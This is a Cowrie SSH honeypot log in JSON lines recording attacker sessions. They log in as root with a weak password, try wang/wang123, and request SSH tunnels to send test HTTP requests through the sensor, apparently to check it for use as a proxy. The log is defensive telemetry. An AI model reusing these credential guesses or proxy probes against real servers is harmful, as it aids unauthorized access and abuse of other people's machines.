{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.255890Z","src_ip":"77.83.207.83","session":"ddcc0ada529b"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.305496Z","src_ip":"77.83.207.83","session":"ddcc0ada529b"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.553761Z","src_ip":"77.83.207.83","session":"ddcc0ada529b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":20717,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:20717","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.604313Z","session":"ddcc0ada529b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.654048Z","src_ip":"77.83.207.83","session":"ddcc0ada529b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":4406,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:4406","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.796511Z","session":"ddcc0ada529b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.846267Z","src_ip":"77.83.207.83","session":"ddcc0ada529b"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":12717,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:12717","sensor":"my-vps","timestamp":"2025-08-31T03:45:21.987964Z","session":"ddcc0ada529b"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.037908Z","src_ip":"77.83.207.83","session":"ddcc0ada529b"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.088682Z","src_ip":"77.83.207.83","session":"ddcc0ada529b"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48479,"dst_ip":"1.2.3.4","dst_port":22,"session":"9073e8a0522f","protocol":"ssh","message":"New connection: 77.83.207.83:48479 (1.2.3.4:22) [session: 9073e8a0522f]","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.137397Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.138377Z","src_ip":"77.83.207.83","session":"9073e8a0522f"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.187992Z","src_ip":"77.83.207.83","session":"9073e8a0522f"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.435381Z","src_ip":"77.83.207.83","session":"9073e8a0522f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"89.221.239.1","dst_port":80,"src_ip":"77.83.207.83","src_port":10104,"message":"direct-tcp connection request to 89.221.239.1:80 from 127.0.0.1:10104","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.486235Z","session":"9073e8a0522f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"89.221.239.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 89.221.239.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.536006Z","src_ip":"77.83.207.83","session":"9073e8a0522f"}
{"eventid":"cowrie.session.connect","src_ip":"34.14.223.46","src_port":41196,"dst_ip":"1.2.3.4","dst_port":22,"session":"c2a2c6b62672","protocol":"ssh","message":"New connection: 34.14.223.46:41196 (1.2.3.4:22) [session: c2a2c6b62672]","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.537498Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.539079Z","src_ip":"34.14.223.46","session":"c2a2c6b62672"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":21155,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:21155","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.676059Z","session":"9073e8a0522f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.725772Z","src_ip":"77.83.207.83","session":"9073e8a0522f"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"src_ip":"77.83.207.83","src_port":747,"message":"direct-tcp connection request to 2001:4998:44:3507::8000:80 from 127.0.0.1:747","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.868025Z","session":"9073e8a0522f"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8000","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8000:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.917851Z","src_ip":"77.83.207.83","session":"9073e8a0522f"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:22.968279Z","src_ip":"77.83.207.83","session":"9073e8a0522f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.017744Z","src_ip":"34.14.223.46","session":"c2a2c6b62672"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48576,"dst_ip":"1.2.3.4","dst_port":22,"session":"886b71501ff7","protocol":"ssh","message":"New connection: 77.83.207.83:48576 (1.2.3.4:22) [session: 886b71501ff7]","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.019327Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.021300Z","src_ip":"77.83.207.83","session":"886b71501ff7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.071903Z","src_ip":"77.83.207.83","session":"886b71501ff7"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.323153Z","src_ip":"77.83.207.83","session":"886b71501ff7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"185.180.201.1","dst_port":80,"src_ip":"77.83.207.83","src_port":4076,"message":"direct-tcp connection request to 185.180.201.1:80 from 127.0.0.1:4076","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.374750Z","session":"886b71501ff7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"185.180.201.1","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 185.180.201.1:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.425206Z","src_ip":"77.83.207.83","session":"886b71501ff7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"98.137.11.164","dst_port":80,"src_ip":"77.83.207.83","src_port":1976,"message":"direct-tcp connection request to 98.137.11.164:80 from 127.0.0.1:1976","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.568852Z","session":"886b71501ff7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"98.137.11.164","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 98.137.11.164:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.619539Z","src_ip":"77.83.207.83","session":"886b71501ff7"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":20251,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:20251","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.760652Z","session":"886b71501ff7"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.811080Z","src_ip":"77.83.207.83","session":"886b71501ff7"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.862172Z","src_ip":"77.83.207.83","session":"886b71501ff7"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48677,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e35f23c765d","protocol":"ssh","message":"New connection: 77.83.207.83:48677 (1.2.3.4:22) [session: 3e35f23c765d]","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.910740Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.911624Z","src_ip":"77.83.207.83","session":"3e35f23c765d"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57e4cc8ee36c3d78f75c6a05acd55963","sensor":"my-vps","timestamp":"2025-08-31T03:45:23.961642Z","src_ip":"77.83.207.83","session":"3e35f23c765d"}
{"eventid":"cowrie.login.success","username":"root","password":"Test@2022","message":"login attempt [root/Test@2022] succeeded","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.211231Z","src_ip":"77.83.207.83","session":"3e35f23c765d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"90.156.232.4","dst_port":80,"src_ip":"77.83.207.83","src_port":10526,"message":"direct-tcp connection request to 90.156.232.4:80 from 127.0.0.1:10526","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.262694Z","session":"3e35f23c765d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"90.156.232.4","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to 90.156.232.4:80 with data b'GET / HTTP/1.0\\r\\nHost: mail.ru\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.312595Z","src_ip":"77.83.207.83","session":"3e35f23c765d"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"74.6.231.21","dst_port":80,"src_ip":"77.83.207.83","src_port":1929,"message":"direct-tcp connection request to 74.6.231.21:80 from 127.0.0.1:1929","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.456230Z","session":"3e35f23c765d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"74.6.231.21","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":1,"message":"discarded direct-tcp forward request 1 to 74.6.231.21:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.506138Z","src_ip":"77.83.207.83","session":"3e35f23c765d"}
{"eventid":"cowrie.login.failed","username":"wang","password":"wang123","message":"login attempt [wang/wang123] failed","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.537104Z","src_ip":"34.14.223.46","session":"c2a2c6b62672"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"src_ip":"77.83.207.83","src_port":21608,"message":"direct-tcp connection request to 2001:4998:44:3507::8001:80 from 127.0.0.1:21608","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.648555Z","session":"3e35f23c765d"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"2001:4998:44:3507::8001","dst_port":80,"data":"b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","id":2,"message":"discarded direct-tcp forward request 2 to 2001:4998:44:3507::8001:80 with data b'GET / HTTP/1.0\\r\\nHost: yahoo.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.699053Z","src_ip":"77.83.207.83","session":"3e35f23c765d"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.750628Z","src_ip":"77.83.207.83","session":"3e35f23c765d"}
{"eventid":"cowrie.session.connect","src_ip":"77.83.207.83","src_port":48769,"dst_ip":"1.2.3.4","dst_port":22,"session":"d420bf1242e7","protocol":"ssh","message":"New connection: 77.83.207.83:48769 (1.2.3.4:22) [session: d420bf1242e7]","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.799208Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.1","message":"Remote SSH version: SSH-2.0-libssh2_1.11.1","sensor":"my-vps","timestamp":"2025-08-31T03:45:24.799979Z","src_ip":"77.83.207.83","session":"d420bf1242e7"}
{"eventid":"cowrie.client.kex","hassh":"57e4cc8ee36c3d78f75c6a05acd55963","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519","ssh-ed25519-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa","ssh-rsa-cert-v01@openssh.com"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh